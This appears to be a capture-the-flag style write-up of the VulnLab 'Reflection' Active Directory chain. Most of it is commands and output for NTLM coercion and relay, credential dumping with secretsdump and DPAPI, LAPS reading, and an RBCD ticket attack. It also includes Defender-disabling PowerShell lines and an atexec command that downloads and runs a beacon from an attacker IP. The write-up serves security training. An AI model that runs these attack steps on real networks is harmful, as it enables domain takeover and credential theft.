Post

VulnLab Reflection

VulnLab Reflection

VulnLab Reflection

Reflection

Recon

1
2
3
10.10.226.101 -> [53,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389]
10.10.226.102 -> [135,445,1433,3389,5985]
10.10.226.103 -> [135,445,3389,7680]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389 10.10.226.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:48 +05
Nmap scan report for 10.10.226.101
Host is up (0.090s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-15 19:47:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.226.101:1433: 
|     Target_Name: REFLECTION
|     NetBIOS_Domain_Name: REFLECTION
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: reflection.vl
|     DNS_Computer_Name: dc01.reflection.vl
|     DNS_Tree_Name: reflection.vl
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   10.10.226.101:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T19:44:05
|_Not valid after:  2055-01-15T19:44:05
|_ssl-date: 2025-01-15T19:48:12+00:00; -1m20s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: dc01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-15T19:47:32+00:00
| ssl-cert: Subject: commonName=dc01.reflection.vl
| Not valid before: 2025-01-14T19:41:08
|_Not valid after:  2025-07-16T19:41:08
|_ssl-date: 2025-01-15T19:48:12+00:00; -1m20s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-15T19:47:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.56 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
└─$ nmap -sC -sV -p135,445,1433,3389,5985 10.10.226.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:50 +05
Nmap scan report for 10.10.226.102
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.226.102:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-15T19:49:45+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T19:41:57
|_Not valid after:  2055-01-15T19:41:57
| ms-sql-ntlm-info: 
|   10.10.226.102:1433: 
|     Target_Name: REFLECTION
|     NetBIOS_Domain_Name: REFLECTION
|     NetBIOS_Computer_Name: MS01
|     DNS_Domain_Name: reflection.vl
|     DNS_Computer_Name: ms01.reflection.vl
|     DNS_Tree_Name: reflection.vl
|_    Product_Version: 10.0.20348
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ms01.reflection.vl
| Not valid before: 2025-01-14T19:41:23
|_Not valid after:  2025-07-16T19:41:23
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: MS01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: ms01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-15T19:49:05+00:00
|_ssl-date: 2025-01-15T19:49:45+00:00; -1m20s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-15T19:49:07
|_  start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.52 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ nmap -sC -sV -p135,445,3389,7680 10.10.226.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 00:51 +05
Nmap scan report for 10.10.226.103
Host is up (0.090s latency).

PORT     STATE    SERVICE       VERSION
135/tcp  open     msrpc         Microsoft Windows RPC
445/tcp  open     microsoft-ds?
3389/tcp open     ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REFLECTION
|   NetBIOS_Domain_Name: REFLECTION
|   NetBIOS_Computer_Name: WS01
|   DNS_Domain_Name: reflection.vl
|   DNS_Computer_Name: ws01.reflection.vl
|   DNS_Tree_Name: reflection.vl
|   Product_Version: 10.0.19041
|_  System_Time: 2025-01-15T19:50:29+00:00
|_ssl-date: 2025-01-15T19:51:09+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=ws01.reflection.vl
| Not valid before: 2025-01-14T19:43:13
|_Not valid after:  2025-07-16T19:43:13
7680/tcp filtered pando-pub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-time: 
|   date: 2025-01-15T19:50:30
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.56 seconds

MS01.reflection.vl

Let’s check if anonymous login is enabled

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ nxc smb targets.txt -u 'Guest' -p '' --shares
SMB         10.10.226.101   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.103   445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.101   445    DC01             [-] reflection.vl\Guest: STATUS_ACCOUNT_DISABLED 
SMB         10.10.226.103   445    WS01             [-] reflection.vl\Guest: STATUS_ACCOUNT_DISABLED 
SMB         10.10.226.102   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.226.102   445    MS01             [+] reflection.vl\Guest: 
SMB         10.10.226.102   445    MS01             [*] Enumerated shares
SMB         10.10.226.102   445    MS01             Share           Permissions     Remark
SMB         10.10.226.102   445    MS01             -----           -----------     ------
SMB         10.10.226.102   445    MS01             ADMIN$                          Remote Admin
SMB         10.10.226.102   445    MS01             C$                              Default share
SMB         10.10.226.102   445    MS01             IPC$            READ            Remote IPC
SMB         10.10.226.102   445    MS01             staging         READ            staging environment
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

It’s enabled on MS01. There’s staging which contains credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ smbclient.py Guest:''@10.10.226.102               
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# use staging
# ls
drw-rw-rw-          0  Thu Jun  8 17:21:36 2023 .
drw-rw-rw-          0  Wed Jun  7 23:41:25 2023 ..
-rw-rw-rw-         50  Thu Jun  8 17:21:49 2023 staging_db.conf
# cat staging_db.conf
user=web_staging
password=<REDACTED>
db=staging
# 

Credentials are valid

1
2
3
└─$ nxc mssql 10.10.226.102 -u 'web_staging' -p '<REDACTED>' --local-auth
MSSQL       10.10.226.102   1433   MS01             [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl)
MSSQL       10.10.226.102   1433   MS01             [+] MS01\web_staging:<REDACTED>

We can check database, which has staging database with users table that contains creds, yet they don’t work

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
└─$ mssqlclient.py web_staging:<REDACTED>@10.10.200.150                                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging
ENVCHANGE(DATABASE): Old Value: master, New Value: staging
INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)> Select name from sys.tables;
name    
-----   
users   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)>

We can’t execute. We can also try retrieving hash, but unfortunately it’s not crackable

1
2
3
SQL (web_staging  dbo@staging)> xp_dirtree \\10.8.4.147\test
subdirectory   depth   file   
------------   -----   ----   
1
2
3
4
└─$ sudo responder -I tun0
<SNIP>
[SMB] NTLMv2-SSP Hash     : svc_web_staging::REFLECTION:f2c0bcc138c1aff1:F8B7C1CBE0160425CAA5D30719123F95:010100000000000000BA1A1F7168DB0170C214A86BB1B2870000000002000800530037004E004A0001001E00570049004E002D00360045003100390045004E005700360052004100320004003400570049004E002D00360045003100390045004E00570036005200410032002E00530037004E004A002E004C004F00430041004C0003001400530037004E004A002E004C004F00430041004C0005001400530037004E004A002E004C004F00430041004C000700080000BA1A1F7168DB01060004000200000008003000300000000000000000000000003000000EF520D614332B83B1EFC4A3C44DD1FFA643728B6DB750976B483A4A85973F6B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0034002E003100340037000000000000000000                                                                                                                                                                                                                      

We can try relaying to hosts, since smb signing is disabled

1
2
3
4
└─$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

<SNIP>
1

And we receive sessions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server -i

<SNIP>
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[]
[*] SMBD-Thread-4 (process_request_thread): Connection from REFLECTION/SVC_WEB_STAGING@10.10.200.150 controlled, attacking target smb://10.10.200.150
[-] Authenticating against smb://10.10.200.150 as REFLECTION/SVC_WEB_STAGING FAILED
[*] Received connection from REFLECTION/svc_web_staging at MS01, connection will be relayed after re-authentication
[ParseResult(scheme='smb', netloc='REFLECTION\\SVC_WEB_STAGING@10.10.200.150', path='', params='', query='', fragment='')]
[*] SMBD-Thread-6 (process_request_thread): Connection from REFLECTION/SVC_WEB_STAGING@10.10.200.150 controlled, attacking target smb://10.10.200.151
[*] Authenticating against smb://10.10.200.151 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11001
<SNIP>

DC01 has prod has shares with creds, but nothing on WS01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ nc 127.0.0.1 11000                              
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 23:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 23:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 17:24:39 2023 prod_db.conf
# cat prod_db.conf
user=web_prod
password=<REDACTED>
db=prod
# 

We can try authenticating against targets. Seems like we can login to MSSQL on DC01

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/vulnlab/chains/reflection]
└─$ nxc mssql targets.txt -u 'web_prod' -p '<REDACTED>' --local-auth
MSSQL       10.10.200.149   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
MSSQL       10.10.200.149   1433   DC01             [+] DC01\web_prod:<REDACTED> 
MSSQL       10.10.200.150   1433   MS01             [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl)
MSSQL       10.10.200.150   1433   MS01             [-] MS01\web_prod:<REDACTED> (Login failed for user 'web_prod'. Please try again with or without '--local-auth')
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Let’s check content. Database structure is identical to MS01’s. New credentials acquired. We can’t execute anything. We can also retrieve hash, but it’s not crackable.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ mssqlclient.py web_prod:'<REDACTED>'@10.10.200.149                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_prod  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   

tempdb                   0   

model                    0   

msdb                     1   

prod                     0   

SQL (web_prod  guest@master)> use prod
ENVCHANGE(DATABASE): Old Value: master, New Value: prod
INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'prod'.
SQL (web_prod  dbo@prod)> select name from sys.tables
name    
-----   
users   

SQL (web_prod  dbo@prod)> select * from users;
id   name              password            
--   ---------------   -----------------   
 1   b'abbie.smith'    b'<REDACTED>'   

 2   b'dorothy.rose'   b'<REDACTED>'

Both creds are valid

1
2
3
4
└─$ nxc smb 10.10.200.149 -u users.txt -p passwords.txt --continue-on-success --no-bruteforce
SMB         10.10.200.149   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.200.149   445    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
SMB         10.10.200.149   445    DC01             [+] reflection.vl\dorothy.rose:<REDACTED>

Let’s enumerate domain with bloodhound

1
2
3
└─$ bloodhound-python -d 'reflection.vl' -u 'abbie.smith' -p '<REDACTED>' -c all -ns 10.10.200.149  --zip
INFO: Found AD domain: reflection.vl
<SNIP>

Looks like abbie.smith has GenericAll over MS01

We can try performing RBCD or Shadow Credentials attack. But we can’t perform them, since MachineAccountQuota is 0 and there is not ADCS

1
2
3
4
5
6
└─$ nxc ldap 10.10.225.133 -u 'abbie.smith' -p '<REDACTED>' -M maq
LDAP        10.10.225.133   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
LDAP        10.10.225.133   389    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
MAQ         10.10.225.133   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.225.133   389    DC01             MachineAccountQuota: 0

Another option is to check LAPS (bloodhound showed GPO), GenericAll gives rights to read attributes. Since LAPS password is in LDAP attributes, we can read it

1
2
3
4
5
└─$ nxc ldap 10.10.225.133 -u 'abbie.smith' -p '<REDACTED>' -M laps
LDAP        10.10.225.133   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:reflection.vl)
LDAP        10.10.225.133   389    DC01             [+] reflection.vl\abbie.smith:<REDACTED> 
LAPS        10.10.225.133   389    DC01             [*] Getting LAPS Passwords
LAPS        10.10.225.133   389    DC01             Computer:MS01$ User:                Password:<REDACTED>

Now we have admin session on

1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -i 10.10.225.134 -u Administrator -p '<REDACTED>'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

WS01.reflection.vl

After dumping creds from MS01, we have new creds for svc_web_staging

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─$ secretsdump.py ./administrator:'<REDACTED>'@10.10.225.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:<REDACTED>
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We notice Georgia.Price user in dump, which has GenericAll over WS01. Let’s check if it’s possible to get creds

We can use SharpDPAPI to check if there are credentials in DPAPI and we successfully retrieve them

We can also use nxc to do it

1
2
3
4
5
6
7
└─$ nxc smb 10.10.225.134 -u Administrator -p '<REDACTED>' --dpapi --local-auth
SMB         10.10.225.134   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.225.134   445    MS01             [+] MS01\Administrator:<REDACTED> (Pwn3d!)
SMB         10.10.225.134   445    MS01             [*] Collecting DPAPI masterkeys, grab a coffee and be patient...
SMB         10.10.225.134   445    MS01             [+] Got 7 decrypted masterkeys. Looting secrets...
SMB         10.10.225.134   445    MS01             [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:<REDACTED>
<SNIP>

We can’t add new computer, but we have a hash for MS01, so we can perform RBCD

1
2
3
4
5
6
7
8
└─$ rbcd.py -delegate-from 'ms01$' -delegate-to 'ws01$' -dc-ip 10.10.225.133 -action 'write' 'reflection.vl/Georgia.Price:<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ms01$ can now impersonate users on ws01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)
1
2
3
4
5
└─$ rbcd.py -delegate-to 'ws01$' -dc-ip 10.10.225.133 -action 'read' 'reflection.vl/Georgia.Price:<REDACTED>'       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

Let’s get a ticket

1
2
3
4
5
6
7
8
9
└─$ getST.py -dc-ip 10.10.225.133 -spn www/ws01 'reflection.vl/ms01$' -impersonate administrator -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_ws01@REFLECTION.VL.ccache

Dump the secrets

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ KRB5CCNAME=administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache secretsdump.py -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:<REDACTED>
<SNIP>
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

To get shell we can disable defender or set exclusion path with atexec.py

1
2
3
4
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -ExclusionPath C:\\

Or use evasive payload

1
2
3
4
5
6
7
8
9
10
└─$ atexec.py -hashes :<REDACTED> ./administrator@ws01.reflection.vl  'powershell.exe -c "iwr http://10.8.4.147:8000/demon.exe -outfile c:\windows\tasks\demon.exe;Start-process c:\windows\tasks\demon.exe"'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] This will work ONLY on Windows >= Vista
[*] Creating task \ujGdRUCo
[*] Running task \ujGdRUCo
[*] Deleting task \ujGdRUCo
[*] Attempting to read ADMIN$\Temp\ujGdRUCo.tmp
[*] Attempting to read ADMIN$\Temp\ujGdRUCo.tmp

We get our system beacon

DC01.reflection.vl

When we dumped creds from DC01, we got Rhys.Garner:<REDACTED> creds. But there’s also user dom_rgarner, who is Domain Admin. It’s quite possible that this is the same user.

Let’s test if there’s password reuse

1
2
3
└─$ nxc smb 10.10.225.133 -u 'dom_rgarner' -p '<REDACTED>'     
SMB         10.10.225.133   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.225.133   445    DC01             [+] reflection.vl\dom_rgarner:<REDACTED> (Pwn3d!)

Dump the domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ secretsdump.py reflection.vl/dom_rgarner:'<REDACTED>'@10.10.225.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<SNIP
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_prod:<REDACTED>
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=73e64769-1783-46dc-a7f3-0fb64989231c

This post is licensed under CC BY 4.0 by the author.